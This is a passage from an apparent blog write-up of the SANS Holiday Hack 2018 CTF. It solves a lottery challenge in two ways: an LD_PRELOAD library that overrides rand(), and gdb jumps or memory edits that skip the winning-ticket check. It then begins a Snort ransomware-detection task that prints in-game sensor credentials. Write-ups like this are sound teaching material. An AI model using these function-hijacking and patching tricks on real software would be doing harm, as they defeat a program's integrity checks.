&lt;span class="go"&gt;Now here I need your hacker skill.&lt;/span&gt;
&lt;span class="go"&gt;To be the one would be a thrill!&lt;/span&gt;
&lt;span class="go"&gt;  Please do your best,&lt;/span&gt;
&lt;span class="go"&gt;  And rig this test&lt;/span&gt;
&lt;span class="go"&gt;The bells to hang on Santa&amp;#39;s sleigh!&lt;/span&gt;
&lt;span class="go"&gt;Complete this challenge by winning the sleighbell lottery for Shinny Upatree.&lt;/span&gt;
&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, let's see this lottery:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt; ls
&lt;span class="go"&gt;gdb  objdump  sleighbell-lotto&lt;/span&gt;
&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt; ./sleighbell-lotto
&lt;span class="go"&gt;The winning ticket is number 1225.&lt;/span&gt;
&lt;span class="go"&gt;Rolling the tumblers to see what number you&amp;#39;ll draw...&lt;/span&gt;
&lt;span class="go"&gt;You drew ticket number 4526!&lt;/span&gt;
&lt;span class="go"&gt;Sorry - better luck next year!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, let's try again:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt; ./sleighbell-lotto
&lt;span class="go"&gt;The winning ticket is number 1225.&lt;/span&gt;
&lt;span class="go"&gt;Rolling the tumblers to see what number you&amp;#39;ll draw...&lt;/span&gt;
&lt;span class="go"&gt;You drew ticket number 9478!&lt;/span&gt;
&lt;span class="go"&gt;Sorry - better luck next year!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we draw a random number, and we're supposed to get 1225.&lt;/p&gt;
&lt;div class="section" id="id1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id38"&gt;Yannick's (dirty) solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;If you remember, we had a similar challenge in &lt;a class="reference external" href="/posts/2018/01/10/sans-christmas-challenge-2017/#id14"&gt;last year's Holiday Hack&lt;/a&gt;. We can create a
fake C library and then use the &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win"&gt;LD_PRELOAD&lt;/a&gt;
trick to change the behaviour of the &lt;code&gt;rand&lt;/code&gt; function. Let's check that
the &lt;code&gt;sleighbell-lotto&lt;/code&gt; uses &lt;code&gt;rand&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt; ./objdump -d ./sleighbell-lotto  &lt;span class="p"&gt;|&lt;/span&gt; grep -i rand
&lt;span class="go"&gt;00000000000009a0 &amp;lt;srand@plt&amp;gt;:&lt;/span&gt;
&lt;span class="go"&gt; 9a0:   ff 25 0a 76 20 00       jmpq   *0x20760a(%rip)        # 207fb0 &amp;lt;srand@GLIBC_2.2.5&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;00000000000009c0 &amp;lt;rand@plt&amp;gt;:&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt; 9c0:   ff 25 fa 75 20 00       jmpq   *0x2075fa(%rip)        # 207fc0 &amp;lt;rand@GLIBC_2.2.5&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;    1505:       e8 96 f4 ff ff          callq  9a0 &amp;lt;srand@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;    1520:       e8 9b f4 ff ff          callq  9c0 &amp;lt;rand@plt&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, it seems to do so. Let's create our fake library. Trouble is, there's
no &lt;code&gt;gcc&lt;/code&gt; on the elf terminal. So let's generate this library on our own
computer, and then copy it to the elf terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat hijack_rand.c
&lt;span class="go"&gt;int rand()&lt;/span&gt;
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    return 1225;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; gcc -o hijack_rand.so -shared -fPIC ./hijack_rand.c
&lt;span class="gp"&gt;$&lt;/span&gt; base64 ./hijack_rand.so
&lt;span class="go"&gt;f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAoAQAAAAAAABAAAAAAAAAABAXAAAAAAAAAAAAAEAAOAAH&lt;/span&gt;
&lt;span class="go"&gt;AEAAGAAXAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAYAAAAAAAA0BgAAAAAAAAAA&lt;/span&gt;
&lt;span class="go"&gt;IAAAAAAAAQAAAAYAAACADgAAAAAAAIAOIAAAAAAAgA4gAAAAAACgAQAAAAAAAKgBAAAAAAAAAAAg&lt;/span&gt;
&lt;span class="go"&gt;AAAAAAACAAAABgAAAJAOAAAAAAAAkA4gAAAAAACQDiAAAAAAAFABAAAAAAAAUAEAAAAAAAAIAAAA&lt;/span&gt;
&lt;span class="go"&gt;AAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAA&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's copy the base64 in the elf terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@04895b80b092:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAoAQAAAAAAABAAAAAAAAAABAXAAAAAAAAAAAAAEAAOAAH&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; AEAAGAAXAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAYAAAAAAAA0BgAAAAAAAAAA&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; IAAAAAAAAQAAAAYAAACADgAAAAAAAIAOIAAAAAAAgA4gAAAAAACgAQAAAAAAAKgBAAAAAAAAAAAg&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; AAAAAAACAAAABgAAAJAOAAAAAAAAkA4gAAAAAACQDiAAAAAAAFABAAAAAAAAUAEAAAAAAAAIAAAA&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; [snip]&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; CAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAANAUAAAAAAAAfAEAAAAAAAAA&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; AAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAABMFgAAAAAAAMMA&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;&lt;span class="s2"&gt; AAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA&amp;quot;&lt;/span&gt; &amp;gt; ./hijack_rand.so.b64
&lt;span class="gp"&gt;elf@bb438504d48c:~$&lt;/span&gt; base64 -d &amp;lt; ./hijack_rand.so.b64 &amp;gt; ./hijack_rand.so
&lt;span class="gp"&gt;elf@bb438504d48c:~$&lt;/span&gt; &lt;span class="nv"&gt;LD_PRELOAD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;./hijack_rand.so&amp;quot;&lt;/span&gt; ./sleighbell-lotto
&lt;span class="go"&gt;The winning ticket is number 1225.&lt;/span&gt;
&lt;span class="go"&gt;Rolling the tumblers to see what number you&amp;#39;ll draw...&lt;/span&gt;
&lt;span class="go"&gt;You drew ticket number 1225!&lt;/span&gt;

&lt;span class="go"&gt;                                                     .....          ......&lt;/span&gt;
&lt;span class="go"&gt;                                     ..,;:::::cccodkkkkkkkkkxdc;.   .......&lt;/span&gt;
&lt;span class="go"&gt;                             .&amp;#39;;:codkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx.........&lt;/span&gt;
&lt;span class="go"&gt;                         &amp;#39;:okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx..........&lt;/span&gt;
&lt;span class="go"&gt;                     .;okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkdc..........&lt;/span&gt;
&lt;span class="go"&gt;                  .:xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkko;.     ........&lt;/span&gt;
&lt;span class="go"&gt;                &amp;#39;lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx:.          ......&lt;/span&gt;
&lt;span class="go"&gt;              ;xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;            .xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;           .kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;           xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx;&lt;/span&gt;
&lt;span class="go"&gt;          :olodxkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk;&lt;/span&gt;
&lt;span class="go"&gt;       ..........;;;;coxkkkkkkkkkkkkkkkkkkkkkkc&lt;/span&gt;
&lt;span class="go"&gt;     ...................,&amp;#39;,,:lxkkkkkkkkkkkkkd.&lt;/span&gt;
&lt;span class="go"&gt;     ..........................&amp;#39;;;:coxkkkkk:&lt;/span&gt;
&lt;span class="go"&gt;        ...............................ckd.&lt;/span&gt;
&lt;span class="go"&gt;          ...............................&lt;/span&gt;
&lt;span class="go"&gt;                ...........................&lt;/span&gt;
&lt;span class="go"&gt;                   .......................&lt;/span&gt;
&lt;span class="go"&gt;                              ....... ...&lt;/span&gt;
&lt;span class="go"&gt;With gdb you fixed the race.&lt;/span&gt;
&lt;span class="go"&gt;The other elves we did out-pace.&lt;/span&gt;
&lt;span class="go"&gt;  And now they&amp;#39;ll see.&lt;/span&gt;
&lt;span class="go"&gt;  They&amp;#39;ll all watch me.&lt;/span&gt;
&lt;span class="go"&gt;I&amp;#39;ll hang the bells on Santa&amp;#39;s sleigh!&lt;/span&gt;
&lt;span class="go"&gt;Congratulations! You&amp;#39;ve won, and have successfully completed this challenge.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id39"&gt;The &amp;quot;official&amp;quot; solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;As we can see from the congratulation message, and the fact that &lt;code&gt;gdb&lt;/code&gt; is
present on the elf shell, the official way to solve this challenge is to use
&lt;code&gt;gdb&lt;/code&gt;. So, let's load the lottery program in &lt;code&gt;gdb&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@2ba77dc8fde8:~$&lt;/span&gt; ./gdb -q ./sleighbell-lotto
&lt;span class="go"&gt;Reading symbols from ./sleighbell-lotto...(no debugging symbols found)...done.&lt;/span&gt;
&lt;span class="go"&gt;(gdb) disas main&lt;/span&gt;
&lt;span class="go"&gt;Dump of assembler code for function main:&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014ca &amp;lt;+0&amp;gt;:     push   %rbp&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014cb &amp;lt;+1&amp;gt;:     mov    %rsp,%rbp&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014ce &amp;lt;+4&amp;gt;:     sub    $0x10,%rsp&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014d2 &amp;lt;+8&amp;gt;:     lea    0x56d6(%rip),%rdi        # 0x6baf&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014d9 &amp;lt;+15&amp;gt;:    callq  0x970 &amp;lt;getenv@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014de &amp;lt;+20&amp;gt;:    test   %rax,%rax&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014e1 &amp;lt;+23&amp;gt;:    jne    0x14f9 &amp;lt;main+47&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014e3 &amp;lt;+25&amp;gt;:    lea    0x56d6(%rip),%rdi        # 0x6bc0&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014ea &amp;lt;+32&amp;gt;:    callq  0x910 &amp;lt;puts@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014ef &amp;lt;+37&amp;gt;:    mov    $0xffffffff,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014f4 &amp;lt;+42&amp;gt;:    callq  0x920 &amp;lt;exit@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014f9 &amp;lt;+47&amp;gt;:    mov    $0x0,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000014fe &amp;lt;+52&amp;gt;:    callq  0x9e0 &amp;lt;time@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001503 &amp;lt;+57&amp;gt;:    mov    %eax,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001505 &amp;lt;+59&amp;gt;:    callq  0x9a0 &amp;lt;srand@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000150a &amp;lt;+64&amp;gt;:    lea    0x583f(%rip),%rdi        # 0x6d50&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001511 &amp;lt;+71&amp;gt;:    callq  0x910 &amp;lt;puts@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001516 &amp;lt;+76&amp;gt;:    mov    $0x1,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000151b &amp;lt;+81&amp;gt;:    callq  0x960 &amp;lt;sleep@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001520 &amp;lt;+86&amp;gt;:    callq  0x9c0 &amp;lt;rand@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001525 &amp;lt;+91&amp;gt;:    mov    %eax,%ecx&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001527 &amp;lt;+93&amp;gt;:    mov    $0x68db8bad,%edx&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000152c &amp;lt;+98&amp;gt;:    mov    %ecx,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001516 &amp;lt;+76&amp;gt;:    mov    $0x1,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000152e &amp;lt;+100&amp;gt;:   imul   %edx&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001530 &amp;lt;+102&amp;gt;:   sar    $0xc,%edx&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001533 &amp;lt;+105&amp;gt;:   mov    %ecx,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001535 &amp;lt;+107&amp;gt;:   sar    $0x1f,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001538 &amp;lt;+110&amp;gt;:   sub    %eax,%edx&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000153a &amp;lt;+112&amp;gt;:   mov    %edx,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000153c &amp;lt;+114&amp;gt;:   mov    %eax,-0x4(%rbp)&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000153f &amp;lt;+117&amp;gt;:   mov    -0x4(%rbp),%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001542 &amp;lt;+120&amp;gt;:   imul   $0x2710,%eax,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001548 &amp;lt;+126&amp;gt;:   sub    %eax,%ecx&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000154a &amp;lt;+128&amp;gt;:   mov    %ecx,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000154c &amp;lt;+130&amp;gt;:   mov    %eax,-0x4(%rbp)&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000154f &amp;lt;+133&amp;gt;:   lea    0x5856(%rip),%rdi        # 0x6dac&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001556 &amp;lt;+140&amp;gt;:   mov    $0x0,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000155b &amp;lt;+145&amp;gt;:   callq  0x8f0 &amp;lt;printf@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001560 &amp;lt;+150&amp;gt;:   mov    -0x4(%rbp),%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001563 &amp;lt;+153&amp;gt;:   mov    %eax,%esi&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001565 &amp;lt;+155&amp;gt;:   lea    0x5858(%rip),%rdi        # 0x6dc4&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000156c &amp;lt;+162&amp;gt;:   mov    $0x0,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001571 &amp;lt;+167&amp;gt;:   callq  0x8f0 &amp;lt;printf@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001576 &amp;lt;+172&amp;gt;:   lea    0x584a(%rip),%rdi        # 0x6dc7&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000157d &amp;lt;+179&amp;gt;:   callq  0x910 &amp;lt;puts@plt&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;   0x0000000000001582 &amp;lt;+184&amp;gt;:   cmpl   $0x4c9,-0x4(%rbp)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;   0x0000000000001589 &amp;lt;+191&amp;gt;:   jne    0x1597 &amp;lt;main+205&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000158b &amp;lt;+193&amp;gt;:   mov    $0x0,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001590 &amp;lt;+198&amp;gt;:   callq  0xfd7 &amp;lt;winnerwinner&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001595 &amp;lt;+203&amp;gt;:   jmp    0x15a1 &amp;lt;main+215&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x0000000000001597 &amp;lt;+205&amp;gt;:   mov    $0x0,%eax&lt;/span&gt;
&lt;span class="go"&gt;   0x000000000000159c &amp;lt;+210&amp;gt;:   callq  0x14b7 &amp;lt;sorry&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000015a1 &amp;lt;+215&amp;gt;:   mov    $0x0,%edi&lt;/span&gt;
&lt;span class="go"&gt;   0x00000000000015a6 &amp;lt;+220&amp;gt;:   callq  0x920 &amp;lt;exit@plt&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;End of assembler dump.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;At the highlighted line, we can see that the value of &lt;code&gt;$rbp - 0x4&lt;/code&gt; is
compared to 0x4c9. This hex value in decimal is 1225, which is the winning
value of the lottery. So this is the comparison that is made between the
winning ticket and our randomly drawn ticket. If they're different, the
program jumps to &lt;code&gt;main+205&lt;/code&gt; and calls the function &lt;code&gt;sorry&lt;/code&gt;. If
they're equal, it continues and calls &lt;code&gt;winnerwinner&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Let's put a breakpoint on this comparison, and run the program:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;(gdb) b *(main+184)&lt;/span&gt;
&lt;span class="go"&gt;Breakpoint 1 at 0x1582&lt;/span&gt;
&lt;span class="go"&gt;(gdb) run&lt;/span&gt;
&lt;span class="go"&gt;Starting program: /home/elf/sleighbell-lotto&lt;/span&gt;
&lt;span class="go"&gt;[Thread debugging using libthread_db enabled]&lt;/span&gt;
&lt;span class="go"&gt;Using host libthread_db library &amp;quot;/lib/x86_64-linux-gnu/libthread_db.so.1&amp;quot;.&lt;/span&gt;

&lt;span class="go"&gt;The winning ticket is number 1225.&lt;/span&gt;
&lt;span class="go"&gt;Rolling the tumblers to see what number you&amp;#39;ll draw...&lt;/span&gt;

&lt;span class="go"&gt;You drew ticket number 8093!&lt;/span&gt;


&lt;span class="go"&gt;Breakpoint 1, 0x0000555555555582 in main ()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we're just before the comparison of our (losing) ticket to 1225. Several
options are available. We can directly jump to the call of
&lt;code&gt;winnerwinner&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;(gdb) j *(main+198)&lt;/span&gt;
&lt;span class="go"&gt;Continuing at 0x555555555590.&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;Congratulations! You&amp;#39;ve won, and have successfully completed this challenge.&lt;/span&gt;
&lt;span class="go"&gt;[Inferior 1 (process 46) exited normally]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can also directly modify the memory, so that our ticket has the winning
value:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;(gdb) x/d ($rbp-0x4)&lt;/span&gt;
&lt;span class="go"&gt;0x7fffffffe5fc: 8093&lt;/span&gt;
&lt;span class="go"&gt;(gdb) set *((int *) ($rbp-0x4)) = 1225&lt;/span&gt;
&lt;span class="go"&gt;(gdb) continue&lt;/span&gt;
&lt;span class="go"&gt;Continuing.&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;Congratulations! You&amp;#39;ve won, and have successfully completed this challenge.&lt;/span&gt;
&lt;span class="go"&gt;[Inferior 1 (process 40) exited normally]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I'm sure there are many more ways to win this lottery, and look forward to read
about them in other write-ups!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="snort-rule"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id40"&gt;Snort Rule&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;In Santa's secret room, we find Alabaster, who is in need of help:&lt;/p&gt;
&lt;img alt="alabaster.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Help, all of our computers have been encrypted by ransomware!&lt;/p&gt;
&lt;p&gt;I came here to help but got locked in 'cause I dropped my &amp;quot;Alabaster
Snowball&amp;quot; badge in a rush.&lt;/p&gt;
&lt;p&gt;I started analyzing the ransomware on my host operating system, ran it by
accident, and now my files are encrypted!&lt;/p&gt;
&lt;p&gt;Unfortunately, the password database I keep on my computer was encrypted,
so now I don't have access to any of our systems.&lt;/p&gt;
&lt;p&gt;If only there were some way I could create some kind of traffic filter that
could alert anytime ransomware was found!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we must stop the ransomware traffic, using the Snort terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;  _  __     _             _       _____          _   _&lt;/span&gt;
&lt;span class="go"&gt; | |/ /    (_)           | |     / ____|        | | | |&lt;/span&gt;
&lt;span class="go"&gt; | &amp;#39; / _ __ _ _ __   __ _| | ___| |     __ _ ___| |_| | ___&lt;/span&gt;
&lt;span class="go"&gt; |  &amp;lt; | &amp;#39;__| | &amp;#39;_ \ / _` | |/ _ \ |    / _` / __| __| |/ _ \&lt;/span&gt;
&lt;span class="go"&gt; | . \| |  | | | | | (_| | |  __/ |___| (_| \__ \ |_| |  __/&lt;/span&gt;
&lt;span class="go"&gt; |_|\_\_|  |_|_|_|_|\__, |_|\___|\_____\__,_|___/\__|_|\___|&lt;/span&gt;
&lt;span class="go"&gt;             / ____| __/ |          | |&lt;/span&gt;
&lt;span class="go"&gt;            | (___  |___/  ___  _ __| |_&lt;/span&gt;
&lt;span class="go"&gt;             \___ \| &amp;#39;_ \ / _ \| &amp;#39;__| __|&lt;/span&gt;
&lt;span class="go"&gt;             ____) | | | | (_) | |  | |_&lt;/span&gt;
&lt;span class="go"&gt;            |_____/|_|_|_|\___/|_|_  \__|&lt;/span&gt;
&lt;span class="go"&gt;               |_   _|  __ \ / ____|&lt;/span&gt;
&lt;span class="go"&gt;                 | | | |  | | (___&lt;/span&gt;
&lt;span class="go"&gt;         _____   | | | |  | |\___ \        __&lt;/span&gt;
&lt;span class="go"&gt;        / ____| _| |_| |__| |____) |      /_ |&lt;/span&gt;
&lt;span class="go"&gt;       | (___  |_____|_____/|_____/ _ __   | |&lt;/span&gt;
&lt;span class="go"&gt;        \___ \ / _ \ &amp;#39;_ \/ __|/ _ \| &amp;#39;__|  | |&lt;/span&gt;
&lt;span class="go"&gt;        ____) |  __/ | | \__ \ (_) | |     | |&lt;/span&gt;
&lt;span class="go"&gt;       |_____/ \___|_| |_|___/\___/|_|     |_|&lt;/span&gt;
&lt;span class="go"&gt;============================================================&lt;/span&gt;
&lt;span class="go"&gt;INTRO:&lt;/span&gt;
&lt;span class="go"&gt;  Kringle Castle is currently under attacked by new piece of&lt;/span&gt;
&lt;span class="go"&gt;  ransomware that is encrypting all the elves files. Your&lt;/span&gt;
&lt;span class="go"&gt;  job is to configure snort to alert on ONLY the bad&lt;/span&gt;
&lt;span class="go"&gt;  ransomware traffic.&lt;/span&gt;
&lt;span class="go"&gt;GOAL:&lt;/span&gt;
&lt;span class="go"&gt;  Create a snort rule that will alert ONLY on bad ransomware&lt;/span&gt;
&lt;span class="go"&gt;  traffic by adding it to snorts /etc/snort/rules/local.rules&lt;/span&gt;
&lt;span class="go"&gt;  file. DNS traffic is constantly updated to snort.log.pcap&lt;/span&gt;
&lt;span class="go"&gt;COMPLETION:&lt;/span&gt;
&lt;span class="go"&gt;  Successfully create a snort rule that matches ONLY&lt;/span&gt;
&lt;span class="go"&gt;  bad DNS traffic and NOT legitimate user traffic and the&lt;/span&gt;
&lt;span class="go"&gt;  system will notify you of your success.&lt;/span&gt;

&lt;span class="go"&gt;  Check out ~/more_info.txt for additional information.&lt;/span&gt;
&lt;span class="gp"&gt;elf@4a4351a6045e:~$&lt;/span&gt; cat more_info.txt
&lt;span class="go"&gt;MORE INFO:&lt;/span&gt;
&lt;span class="go"&gt;  A full capture of DNS traffic for the last 30 seconds is&lt;/span&gt;
&lt;span class="go"&gt;  constantly updated to:&lt;/span&gt;
&lt;span class="go"&gt;  /home/elf/snort.log.pcap&lt;/span&gt;
&lt;span class="go"&gt;  You can also test your snort rule by running:&lt;/span&gt;
&lt;span class="go"&gt;  snort -A fast -r ~/snort.log.pcap -l ~/snort_logs -c /etc/snort/snort.conf&lt;/span&gt;
&lt;span class="go"&gt;  This will create an alert file at ~/snort_logs/alert&lt;/span&gt;
&lt;span class="go"&gt;  This sensor also hosts an nginx web server to access the&lt;/span&gt;
&lt;span class="go"&gt;  last 5 minutes worth of pcaps for offline analysis. These&lt;/span&gt;
&lt;span class="go"&gt;  can be viewed by logging into:&lt;/span&gt;
&lt;span class="go"&gt;  http://snortsensor1.kringlecastle.com/&lt;/span&gt;
&lt;span class="go"&gt;  Using the credentials:&lt;/span&gt;
&lt;span class="go"&gt;  ----------------------&lt;/span&gt;
&lt;span class="go"&gt;  Username | elf&lt;/span&gt;
&lt;span class="go"&gt;  Password | onashelf&lt;/span&gt;
&lt;span class="go"&gt;  tshark and tcpdump have also been provided on this sensor.&lt;/span&gt;
&lt;span class="go"&gt;HINT:&lt;/span&gt;
&lt;span class="go"&gt;  Malware authors often user dynamic domain names and&lt;/span&gt;
&lt;span class="go"&gt;  IP addresses that change frequently within minutes or even&lt;/span&gt;
&lt;span class="go"&gt;  seconds to make detecting and block malware more difficult.&lt;/span&gt;
&lt;span class="go"&gt;  As such, its a good idea to analyze traffic to find patterns&lt;/span&gt;
&lt;span class="go"&gt;  and match upon these patterns instead of just IP/domains.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We must create a rule that will match all the ransomware's traffic, and won't
match the legitimate users' traffic. We're given access to a website which
contains PCAP files with the DNS traffic of the last five minutes.&lt;/p&gt;
